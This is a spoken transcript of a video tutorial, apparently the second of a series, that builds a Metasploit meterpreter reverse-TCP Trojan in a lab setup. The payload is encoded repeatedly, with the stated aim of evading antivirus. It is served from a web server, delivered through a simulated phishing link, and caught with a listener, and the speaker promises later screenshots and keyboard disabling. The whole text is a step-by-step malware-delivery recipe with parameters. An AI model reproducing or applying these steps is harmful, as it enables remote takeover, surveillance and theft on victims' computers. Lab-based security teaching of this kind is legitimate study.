Alright, as promised, we're back here to our second tutorial. And we're actually going to create a Trojan and send it over to this computer. So this one here, the backtrack, is the attacking computer. This is the one being attacked over here, the XP machine. So we're going to use this tool called metasploit. We're going to make a payload like this. Windows /meterpreter /reverse _ TCP. I'll explain this right here in a few minutes. Lhost, which stands for localhost, equals 192.168.56.101, and that is the IP address of this machine here. L port, we'll just pick a random, we'll do 4442. And what we'll do is we'll encode the actual package. You'll say, well, why would we want to do that? And that's to bypass antiviruses. We don't want antiviruses to flag our sweet little downloadable Trojan as a malicious software. So what we do is we actually wrap it around many times so that hopefully it won't dig down into the actual payload and we can go ahead and fool it. So the first encoding we're going to do is a thing called shikata ga nai, which is actually Japanese for there's nothing you can do about it. Pretty sweet. And type raw taxi for count. How many times do we want to encode it? We want to do it 10 times. So let's see, 10. And let's encode it again. The more the better. This time we'll do x86-call for _dword _xor. Once again, type will be raw file taxi. We'll wrap that 10 times as well. And just for giggles, let's do ahead and encode it one more time just to make sure we can bypass any firewalls. So tacky. This time we'll do an x86/countdown tact. This time we'll make an executable. Alright, being from Texas, why don't we call it chuck.exe. Alright, well that's encoded. I'll explain this briefly. Right here, MSF payload, what we're doing is we're making the payload that we're going to drop onto this computer. And when they double click it, it will run this what's called meterpreter shell. And it will drop a shell on that computer, allowing me to do a bunch of different things on it with this meterpreter. This is a subset of metasploit, and it's a shell tool which allows me to have pretty much command and control over the XP machine, run VNC, take screenshots, whatever I want to do. The reverse TCP section is for if somebody has a firewall or a NAT router, so that I can go ahead and get past that, because what I'll be doing is telling the other computer to ask for me to enter into that computer. Almost like, let's see, what's a good analogy? Let's say, like in the Lost Boys movies, right? You had the vampires and you couldn't come in the house unless they're invited. Well, the same type of thing. Unless I'm invited into this computer, then I can get past them firewalls. And that's what the reverse TCP is for. Alright, so we've created the payload. So let's go ahead and move that into my actual web server. Let's see, chuck.exe right there. Copy. I'm going to put that in my actual web server, which will be running on Linux. Alright, so now it's in my actual web server. And what I already did previously, so I won't do it again, is I went to backtrack, went down to services, I went to HTTP, and I started the Apache start, and that started my Apache web server. So it is running, and one way we can test that out to see if it is running is to go over to the victim, open up a browser, and we'll simulate that we actually sent them a malicious link and a phished email of some sort. So Let's connect to my computer. 192.168.56.101. Let's see if it's there. Alright, so it's working. So my web server is working. And the name of the file I want them to maliciously download is chunk. And we'll have them save that to their desktop. Leave that there for a second. We'll come back here. Now we're going to create what's called a listener, so that when I double click on it, I'll be listening and I'll be able to get command and control of that computer. So when they run that Trojan, that little payload that I had there, the meterpreter one, it's actually waiting for something. It's actually waiting for them to double click, but I have to be waiting on my end to accept that, which is what I'm doing here. And we'll set the payload as the one that we set for our actual Trojan, which was Windows/meterpreter. Hopefully I'll fat finger it. Reverse_TCP. Alright, and then we'll set our L host, which is our local host, which is the host address of this backtrack computer. 56.101, and we set the L port. What do we do? 4442, I think. Exploit. Now it's listening. So the person's over here on the victim computer. They've downloaded a sweet movie, maybe, I don't know, whatever you wanted to make the executable, and they think they're opening something that they want. But in actuality, when they create run, run there, click run there. Let's look over our computer. Bada bing, boom, done. Next video, we'll go ahead and show you what you can do in meterpreter, such as taking screenshots, disabling their keyboards, all kinds of good stuff.